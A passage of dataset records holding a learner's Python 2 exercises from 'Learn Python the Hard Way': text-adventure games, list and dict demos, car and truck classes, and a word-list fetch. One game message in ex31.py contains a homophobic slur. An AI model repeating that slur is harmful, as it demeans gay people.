55\nC = 11\n\none_in_10_function(A,B,C)\none_in_10_function(\"a\",\"b\",\"c\")\none_in_10_function(A+10,B+10,C+10)" }, { "alpha_fraction": 0.4354838728904724, "alphanum_fraction": 0.4677419364452362, "avg_line_length": 10.181818008422852, "blob_id": "4b67de71c01d0a0ef3957d935683bd644e7506e2", "content_id": "14d27a79bbed69d4fa9ed7b3198f05e82689af4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 18, "num_lines": 11, "path": "/ex111.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def x(y):\n\ty.append(3)\n\treturn y\n\nz = list()\n#z = []\n#y = undefined\nprint x(z)\n#z = [] or z = [3]\n#z =[], z2 = [3]\nprint z\n\n" }, { "alpha_fraction": 0.5291308760643005, "alphanum_fraction": 0.5453677177429199, "avg_line_length": 41.75510025024414, "blob_id": "26ec81daa472f90317dcaf76efe0acebd1c1bf5b", "content_id": "b4705dfa051bb027e17e0632cc5c0a8e8886e872", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 115, "num_lines": 49, "path": "/ex31fun.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You have 3 doors in front of you.. door #1, #2, #3, choose wisely or you shall face the wrath of this code:\"\n\ndef doors():\n\n door = raw_input(\"> \")\n if door == \"1\":\n print \"you walk in the room with a sleeping bear. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Wet your pants and prepare for Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Sry m8 the door is locked. Do you:\"\n print \"1. Turn around and walk the way you came from.\"\n print \"2. Wake the bear up (lol).\"\n print \"3. Wet your pants and prepare for Seppuku\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"You turn around and stumble into the bear, waking him up, he gets mad and eats you.\"\n print \"Game over!\"\n elif door1 == \"2\":\n print \"you wake up the bear, who is mad, and he eats you.\"\n print \"Game over!\"\n elif door1 == \"3\":\n print \"you pull out your blade, but then realize oh snap I have a blade. Do you:\"\n print \"1. Still kill yourself because you don't wanna get eaten.\"\n print \"2. Perform a flying downward sword thrust of doom.\"\n door1 = raw_input(\"> \")\n if door1 == \"1\":\n print \"Good try, but Game over!\"\n elif door1 == \"2\":\n print \"Congratulations! You defeated the bear and completed level 6.\"\n else:\n print \"You didnt pick a valid option, so the bear wakes up and eats you.\"\n print \"Game over!\"\n else:\n print \"You did not follow the directions, the bear wakes up and eats you.\"\n print \"Game over!\"\n elif door == \"2\":\n print \"Door 2 is locked. Try another door.\"\n doors()\n elif door == \"3\":\n print \"Door 3 is locked. Try another door.\"\n doors()\n else:\n print \"Uhh you did not pick a door option, please try again.\"\n doors()\n\ndoors()" }, { "alpha_fraction": 0.6171003580093384, "alphanum_fraction": 0.6394051909446716, "avg_line_length": 19.69230842590332, "blob_id": "c41adcbdf55b50f43552e25bc2725c9b96b7378f", "content_id": "02f5624a2537103d836af63cd88c60704ef6d947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/ex39.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"\\n\\n\\n\\n\"\nprint \"This is a simple example of a list:\"\nthings = ['a', 'b','c','d']\nprint things[1]\nthings[1] = 'z'\nprint things\nprint \"\\n\"\nprint \"Now lets look at dicts:\"\nstuff = {'name': 'Zed', 'age': 39, 'height': 6*12 +2}\nprint stuff['name']\nprint stuff['age']\nprint stuff['height']\nstuff['city'] = \"San Francisco\"\nprint stuff['city']\nprint stuff\nprint \"\\n\\n\\n\"\nstuff[1] = 'wow'\nstuff[2] = 'Neato'\nprint stuff\nprint '\\n\\n\\n'\nprint \"no delete stuff use del:\"\ndel stuff['city']\ndel stuff[1]\ndel stuff[2]\nprint stuff\nprint \"\\n\\n\\n\"\n" }, { "alpha_fraction": 0.5893617272377014, "alphanum_fraction": 0.6048632264137268, "avg_line_length": 32.581634521484375, "blob_id": "791fdaa855a13a38ae52472668c626e871bfd263", "content_id": "d55f5b70b4041b10c2d9dda2d24f0f00e4442e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3290, "license_type": "no_license", "max_line_length": 81, "num_lines": 98, "path": "/ClassCarObjectEx2.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "class Car(object):\n \"\"\" A car for sale by Serge U Dealership.\n\n Attributes:\n wheels: An integer representing the number of wheels the car has.\n miles: The integral number of miles driven on the car.\n make: The make of the car as a string.\n model: The model of the car as a string.\n year: The integral year the car was built.\n sold_on: The date the vehicle was sold.\n \"\"\"\n\n def __init__(self, wheels, miles, make, model, year, sold_on):\n \"\"\"\n :param wheels: An integer representing the number of wheels the car has.\n :param miles: The integral number of miles driven on the car.\n :param make: The make of the car as a string.\n :param model: The model of the car as a string.\n :param year: The integral year the car was built.\n :param sold_on: The date the vehicle was sold.\n :return: A new Car object\n \"\"\"\n self.wheels = wheels\n self.miles = miles\n self.make = make\n self.model = model\n self.year = year\n self.sold_on = sold_on\n\n def sale_price(self):\n \"\"\"\n :return: Return the sale price for this car as a float amount.\n \"\"\"\n if self.sold_on is not None:\n return 0.0 # Already sold\n return 5000.0 * self.wheels\n\n def purchase_price(self):\n \"\"\"\n :return: Return the price for which we would pay to purchase the vehicle.\n \"\"\"\n if self.sold_on is None:\n return 0.0 # Not yet sold\n return 8000 - (.10 * self.miles)\n\nclass Truck(object):\n \"\"\"A truck for sale by Serge U. Dealership.\n\n Attributes:\n wheels: An integer representing the number of wheels the car has.\n miles: The integral number of miles driven on the truck.\n make: The make of the truck as a string.\n model: The model of the truck as a string.\n year: The integral year the truck was built.\n sold_on: The date the vehicle was sold.\n \"\"\"\n def __init__(self, wheels, miles, make, model, year, sold_on):\n \"\"\"\n :param wheels: An integer representing the number of wheels the car has.\n :param miles: The integral number of miles driven on the truck.\n :param make: The make of the truck as a string.\n :param model: The model of the truck as a string.\n :param year: The integral year the truck was built.\n :param sold_on: The date the vehicle was sold.\n :return: Return a new Truck object.\n \"\"\"\n self.wheels = wheels\n self.miles = miles\n self.make = make\n self.model = model\n self.year = year\n self.sold_on = sold_on\n\n def sale_price(self):\n \"\"\"\n :return: Return the sale price for this truck as a float amount.\n \"\"\"\n if self.sold_on is not None:\n return 0.0 # Already sold\n return 5000.0 * self.wheels\n\n def purchase_price(self):\n \"\"\"\n :return: Return the price for which we would pay to purchase\n \"\"\"\n if self.sold_on is None:\n return 0.0 # Not yet sold\n return 10000 - (.10 * self.miles)\n\ncarA = Car(4,40000, \"nissan\", \"leaf\", 2016, None)\nprint carA.year\nprint carA.make\nprint carA\n\ncarB = Truck(4, 70000, \"Ford\", \"Escort\", 2001, None)\n\nprint carB.model\nprint carB.miles" }, { "alpha_fraction": 0.6154276132583618, "alphanum_fraction": 0.6260480880737305, "avg_line_length": 39.65909194946289, "blob_id": "25471a64dd39b71e6b693e3a50938f6e2325f01f", "content_id": "6d6afedb2f701260ede04383457f479b46e85594", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1789, "license_type": "no_license", "max_line_length": 142, "num_lines": 44, "path": "/ex31.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "print \"You enter a dark room with two doors. Do you go through door #1 or door #2?\"\n\ndoor = raw_input(\"> \")\n\nif door == \"1\":\n print \"There's a giant bear here eating a cheese cake! What do you do?!\"\n print \"1. Take the cake.\"\n print \"2. Scream at the bear.\"\n print \"3. Pretend you are dead.\"\n\n bear = raw_input(\"> \")\n\n if bear == \"1\":\n print \"The bear eats your face off. Good job!\"\n elif bear == \"2\":\n print \"The bear proceeds to eat your legs off. Good job faggot!\"\n elif bear == \"3\":\n print \"He saw you fall to the ground and begins to eat you...\"\n print \"Do you want to: \\n1. Accept your fate and die like a man.\\n2. Punch the bear in the nostrils.\"\n fate = raw_input(\"> \")\n if fate == \"1\":\n print \"The bear thinks you are either a pussy and feels bad for you or you are dead, so he walks away in disgust\"\n elif fate == \"2\":\n print \"The bear gets really pissed and bites off your hand, then spits it out and shoves it in your ass. You die of constipation.\"\n else:\n print \"You hesitated and pissed your pants, and the bear wants nothing to deal with a pants pisser.\"\n else:\n print \"Well, doing %s is probably better. Bear runs away.\" % bear\n\nelif door == \"2\":\n print \"You stare into the endless abyss at Cthulu's retina.\"\n print \"1. Blueberries.\"\n print \"2. Yellow jacket clothespins.\"\n print \"3. Understanding revolvers yelling melodies.\"\n\n insanity = raw_input(\"> \")\n\n if insanity == \"1\" or insanity == \"2\":\n print \"Your body survives powered by a mind of jello. Good job!\"\n else:\n print \"The insanity rots your eyes into a pool of much. Good job!\"\n\nelse:\n print \"You stumble around and fall on a knife and die. Good job!\"\n" }, { "alpha_fraction": 0.37837839126586914, "alphanum_fraction": 0.5135135054588318, "avg_line_length": 5.333333492279053, "blob_id": "39fa5f87681b7cea43053029c433a404a70858d1", "content_id": "5df1b3a687a12d64af6101200a7456cb7698f170", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "no_license", "max_line_length": 13, "num_lines": 6, "path": "/ex36.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "x = 5\n\nx == 10\n\nprint x\nprint x == 10" }, { "alpha_fraction": 0.6763485670089722, "alphanum_fraction": 0.6929460763931274, "avg_line_length": 17.576923370361328, "blob_id": "c38b6d2d229ca2bd3b69e532281b5fd23cfeda33", "content_id": "6a85b2e38b84be9eaa8fa9d5e13edabb1b81fb5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/oop_test1.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "from urllib import urlopen\n\n\nWORD_URL = \"http://learncodethehardway.org/words.txt\"\nWORDS = []\n\n\n# load up the words from the website\nfor word in urlopen(WORD_URL).readlines():\n WORDS.append(word.strip())\n\n\nprint \"*\" * 134\nprint urlopen(WORD_URL).readlines()\n\nprint \"*\" * 134\nprint WORDS\n\nfruits = ['banana', 'apple', 'mango']\nfor index in range(len(fruits)):\n print 'Current fruit :', fruits[index]\n\nprint len(fruits)\nprint range(80)\nprint range(len(fruits))\nprint \"Good bye!\"" }, { "alpha_fraction": 0.5098039507865906, "alphanum_fraction": 0.5686274766921997, "avg_line_length": 8, "blob_id": "6a1004fc73489dfc88b289558cee3908904439e2", "content_id": "3eb3fcd72a045084ddbe517ea7ad1ed4c233ded2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 13, "num_lines": 5, "path": "/ex21sd.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def simple():\n\tprint 5\n\treturn 10\n\t\nsimple()\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6730769276618958, "alphanum_fraction": 0.692307710647583, "avg_line_length": 25.25, "blob_id": "bdcdb9efdb20ab1b80b3b28d26d748a6de3825ac", "content_id": "fe7b10cd561c4539f700f3079d5b9dd5edb05df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 34, "num_lines": 4, "path": "/basicfunctionpractice.py", "repo_name": "surakhchin/Learn-Python-the-Hard-Way", "src_encoding": "UTF-8", "text": "def print_function_one_argument():\n\tprint \"You whatsup I'm %r\" % (1)\nx = 2\nprint_function_one_argument()" } ]
15
osorkon5513/turing201620
https://github.com/osorkon5513/turing201620
75d2eed3ead317d498bd8dd664f47db8ab20ebd3
0c864e054cc54c2e59f08db6c3abf1b0726efe7e
314c4b517662127d690839b1df09bd77532f617e
refs/heads/master
2020-08-03T22:40:50.057566
2016-10-22T20:03:28
2016-10-22T20:03:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.558728814125061, "alphanum_fraction": 0.5664591193199158, "avg_line_length": 43.35238265991211, "blob_id": "e33967d2ad59aab3aa274bed3852801e2a7624e3", "content_id": "ba9807fe3c89feca6e17b4657b436855c6697e4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4657, "license_type": "no_license", "max_line_length": 144, "num_lines": 105, "path": "/sonidosLibresApp/migrations/0001_initial.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-08 22:01\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('rating', models.FloatField(default=0, editable=False)),\n ('numOfRatings', models.IntegerField(default=0, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Artist',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('image', models.URLField()),\n ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'artists',\n },\n ),\n migrations.CreateModel(\n name='Audio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('title', models.CharField(max_length=40)),\n ('audioDownload', models.URLField()),\n ('audioPlay', models.URLField()),\n ('playCount', models.IntegerField(default=0, editable=False)),\n ('downloadsCount', models.IntegerField(default=0, editable=False)),\n ('rating', models.FloatField(default=0, editable=False)),\n ('numOfRatings', models.IntegerField(default=0, editable=False)),\n ('uploadDate', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n ('albums', models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Album')),\n ('artists', models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Artist')),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=40)),\n ('image', models.URLField()),\n ],\n options={\n 'verbose_name_plural': 'categories',\n },\n ),\n migrations.CreateModel(\n name='Commentary',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('commentary', models.TextField()),\n ('date', models.DateTimeField(default=django.utils.timezone.now, editable=False)),\n ('audio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sonidosLibresApp.Audio')),\n ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name_plural': 'commentaries',\n },\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='audio',\n name='categories',\n field=models.ManyToManyField(related_name='audios', to='sonidosLibresApp.Category'),\n ),\n migrations.AddField(\n model_name='album',\n name='artists',\n field=models.ManyToManyField(related_name='albums', to='sonidosLibresApp.Artist'),\n ),\n migrations.AddField(\n model_name='album',\n name='categories',\n field=models.ManyToManyField(related_name='albums', to='sonidosLibresApp.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.5674740672111511, "alphanum_fraction": 0.6262975931167603, "avg_line_length": 26.5238094329834, "blob_id": "b8d377b4165ac721fa26c9f3b1f7f1272d8d89c2", "content_id": "2d122a70cba33e1fc104e2e06353c31ee3e5db0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 137, "num_lines": 21, "path": "/sonidosLibresApp/migrations/0003_album_image.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-12 13:03\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0002_auto_20161008_2224'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='album',\n name='image',\n field=models.URLField(default='https://github.com/slinan/sonidosLibresG2/blob/master/docs/assets/img/albums/1.jpg?raw=true'),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7081934213638306, "alphanum_fraction": 0.7152451276779175, "avg_line_length": 35.77777862548828, "blob_id": "5d64a566ee3f49e1608463dc7ae7baff4bf3f46c", "content_id": "3625544ddf1c5369cc7689b24a7d21655cae08bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 90, "num_lines": 81, "path": "/sonidosLibresApp/models.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from datetime import datetime\n\nimport django\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils import timezone\n\nclass Category(models.Model):\n def __str__(self):\n return self.name\n class Meta:\n verbose_name_plural = \"categories\"\n\n name = models.CharField(max_length=40)\n image = models.URLField()\n description = models.TextField()\n relatedCategories = models.ManyToManyField('self')\n\n\nclass Artist(models.Model):\n def __str__(self):\n return self.name\n class Meta:\n verbose_name_plural = \"artists\"\n\n name = models.CharField(max_length=40)\n user = models.OneToOneField(User, null=True, blank=True)\n image = models.URLField()\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n Artist.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.artist.save()\n\nclass Album (models.Model):\n def __str__(self):\n return self.title\n title = models.CharField(max_length=100)\n rating = models.FloatField(editable=False, default = 0)\n numOfRatings = models.IntegerField(editable=False, default = 0)\n categories = models.ManyToManyField(Category,related_name=\"albums\", blank=True)\n artists = models.ManyToManyField(Artist, related_name=\"albums\", blank=True)\n image = models.URLField()\n\nclass Audio(models.Model):\n def __str__(self):\n return self.title + \" \"+str(self.id)\n name = models.CharField(max_length=40)\n title = models.CharField(max_length=40)\n audioDownload = models.URLField()\n audioPlay = models.URLField()\n playCount = models.IntegerField(editable=False, default = 0)\n downloadsCount = models.IntegerField(editable=False, default = 0)\n rating = models.FloatField(editable=False, default = 0)\n numOfRatings = models.IntegerField(editable=False, default = 0)\n categories = models.ManyToManyField(Category,related_name=\"audios\")\n uploadDate = models.DateTimeField(editable=False, default = django.utils.timezone.now)\n albums = models.ManyToManyField(Album, related_name=\"audios\")\n artists = models.ManyToManyField(Artist, related_name=\"audios\")\n\nclass Commentary (models.Model):\n def __str__(self):\n return self.commentary\n class Meta:\n verbose_name_plural = \"commentaries\"\n commentary = models.TextField()\n date = models.DateTimeField(editable=False, default = django.utils.timezone.now)\n audio = models.ForeignKey(Audio,on_delete=models.CASCADE)\n user = models.OneToOneField(User, null=True, blank=True)\n\n # python manage.py makemigrations sonidosLibresApp\n # python manage.py sqlmigrate sonidosLibresApp 0001\n # python manage.py migrate\n # python manage.py createsuperuser\n # $ heroku run python manage.py migrate --app sonidoslibres" }, { "alpha_fraction": 0.5873655676841736, "alphanum_fraction": 0.6142473220825195, "avg_line_length": 28.760000228881836, "blob_id": "066644365f0f6288b560f39bccd1dcaef19b8a32", "content_id": "f49637d461bbbd0ee4092b58af8f624d75267d2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "no_license", "max_line_length": 119, "num_lines": 25, "path": "/sonidosLibresApp/migrations/0004_auto_20161012_1128.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-12 16:28\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0003_album_image'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='album',\n name='artists',\n field=models.ManyToManyField(blank=True, null=True, related_name='albums', to='sonidosLibresApp.Artist'),\n ),\n migrations.AlterField(\n model_name='album',\n name='categories',\n field=models.ManyToManyField(blank=True, null=True, related_name='albums', to='sonidosLibresApp.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 20.66666603088379, "blob_id": "70f4150cb42eb39a4bea83126ffbf3222c7f11c4", "content_id": "477890f76eb9dcbfd984d72e85aa08c29778138a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/sonidosLibresApp/customFilters.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "import django_filters\n\nfrom sonidosLibresApp.models import Audio" }, { "alpha_fraction": 0.6116071343421936, "alphanum_fraction": 0.6294642686843872, "avg_line_length": 49.58064651489258, "blob_id": "4655148fcf721d9af7e246f6a4491d622bda96a4", "content_id": "b4f4cf51bfb9332a85f8a5b3371a2ba7c41e9a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 106, "num_lines": 31, "path": "/sonidosLibresApp/urls.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\nfrom sonidosLibresApp import views\n\nrouter = DefaultRouter()\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^login/?$', views.CustomObtainAuthToken.as_view()),\n url(r'^signUp/?$', views.CreateUserView.as_view()),\n url(r'^audios/?$', views.AudioList.as_view()),\n url(r'^audios/(?P<pk>[0-9]+)/?$', views.AudioDetail.as_view()),\n url(r'^artists/?$', views.ArtistList.as_view()),\n url(r'^artists/(?P<pk>[0-9]+)/?$', views.ArtistDetail.as_view()),\n url(r'^categories/?$', views.CategoryList.as_view()),\n url(r'^categories/(?P<pk>[0-9]+)/?$', views.CategoryDetail.as_view()),\n url(r'^albums/?$', views.AlbumList.as_view()),\n url(r'^albums/(?P<pk>[0-9]+)/?$', views.AlbumDetail.as_view()),\n url(r'^commentaries/?$', views.CommentaryList.as_view()),\n url(r'^commentaries/(?P<pk>[0-9]+)/?$', views.CommentaryDetail.as_view()),\n url(r'^albumAudio/(?P<idAudio>[0-9]+)/(?P<idAlbum>[0-9]+)/?$', views.AudioAlbumAssociation.as_view()),\n url(r'^rateAudio/(?P<idAudio>[0-9]+)/(?P<rating>[0-5])/?$', views.RateAudio.as_view()),\n url(r'^rateAlbum/(?P<idAlbum>[0-9]+)/(?P<rating>[0-5])/?$', views.RateAlbum.as_view()),\n url(r'^play/(?P<idAudio>[0-9]+)/?$', views.PlayAudio.as_view()),\n url(r'^download/(?P<idAudio>[0-9]+)/?$', views.DownloadAudio.as_view()),\n url(r'^categoriesTopRating/(?P<size>[0-9]+)/?$', views.CategoriesTopRating.as_view()),\n\n]\n\n#urlpatterns =format_suffix_patterns(urlpatterns)\nurlpatterns += router.urls\n" }, { "alpha_fraction": 0.7943925261497498, "alphanum_fraction": 0.7943925261497498, "avg_line_length": 20.399999618530273, "blob_id": "796dbd67b2f070b70414ec37155882fd5c764872", "content_id": "15b316de3548b0db7b474de63e69e3ebb54936be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/sonidosLibresApp/apps.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SonidosLibresAppConfig(AppConfig):\n name = 'sonidosLibresApp'\n" }, { "alpha_fraction": 0.6679738759994507, "alphanum_fraction": 0.6679738759994507, "avg_line_length": 27.351852416992188, "blob_id": "856284a6f87cceafb0b1050cedac2d435ab3c478", "content_id": "020b710854935a87c2a00485e54e9582224dd819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 132, "num_lines": 54, "path": "/sonidosLibresApp/serializers.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom .models import Audio, Category, Album, Commentary, Artist\n\nclass AudioCreate(serializers.ModelSerializer):\n class Meta:\n model = Audio\n\nclass AudioSerializer(serializers.ModelSerializer):\n class Meta:\n model = Audio\n\nclass AlbumSerializer(serializers.ModelSerializer):\n class Meta:\n model = Album\n\nclass ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model=Artist\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model=Category\n\nclass CategoryWithAudiosSerializer(serializers.ModelSerializer):\n class Meta:\n model=Category\n fields = ['id','name', 'image','audios']\n\n\nclass CommentarySerializer(serializers.ModelSerializer):\n class Meta:\n model=Commentary\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'username', 'password', 'email', 'first_name', 'last_name','is_superuser', 'is_staff','is_active', 'groups')\n write_only_fields = ('password',)\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n email=validated_data['email'],\n first_name=validated_data['first_name'],\n last_name=validated_data['last_name']\n )\n user.set_password(validated_data['password'])\n user.save()\n\n return user" }, { "alpha_fraction": 0.6712474822998047, "alphanum_fraction": 0.6720216870307922, "avg_line_length": 37.132843017578125, "blob_id": "1f7e47e7f07e26dca91b992ba9d94beb45314d80", "content_id": "4e88b9eeffeaeaf4d097edf795b8d4a2956d5ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10333, "license_type": "no_license", "max_line_length": 126, "num_lines": 271, "path": "/sonidosLibresApp/views.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from tokenize import Token\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom rest_framework import permissions\nfrom rest_framework.authentication import BasicAuthentication, TokenAuthentication\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.authtoken.models import Token\n\nfrom django.shortcuts import render\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.views import APIView\nfrom rest_framework import filters\nfrom sonidosLibresApp.customPagination import StandardResultsSetPagination\nfrom sonidosLibresApp.serializers import AudioSerializer, CategorySerializer, AlbumSerializer, CommentarySerializer, \\\n ArtistSerializer, UserSerializer\nfrom .models import Audio, Category, Album, Commentary, Artist\nfrom rest_framework.response import Response\n\ndef index(request):\n return render(request, 'index.html')\n\nclass CustomObtainAuthToken(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n response = super(CustomObtainAuthToken, self).post(request, *args, **kwargs)\n token = Token.objects.get(key=response.data['token'])\n user = User.objects.get(id = token.user_id)\n serializer = UserSerializer(user)\n return Response({'token': token.key, 'id': token.user_id, 'user': serializer.data})\n\nclass CreateUserView(CreateAPIView):\n\n model = get_user_model()\n permission_classes = [\n permissions.AllowAny # Or anon users can't register\n ]\n serializer_class = UserSerializer\n\nclass AudioList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n\n queryset = Audio.objects.all()\n serializer_class = AudioSerializer\n filter_backends = (filters.DjangoFilterBackend,filters.OrderingFilter,)\n pagination_class = StandardResultsSetPagination\n filter_fields = ('title', 'rating', 'playCount', 'downloadsCount','uploadDate','numOfRatings', 'categories','albums')\n ordering_fields = ('title', 'rating', 'playCount', 'downloadsCount','uploadDate','numOfRatings')\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass AudioDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n\n queryset = Audio.objects.all()\n serializer_class = AudioSerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass ArtistList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Artist.objects.all()\n serializer_class = ArtistSerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass ArtistDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Artist.objects.all()\n serializer_class = 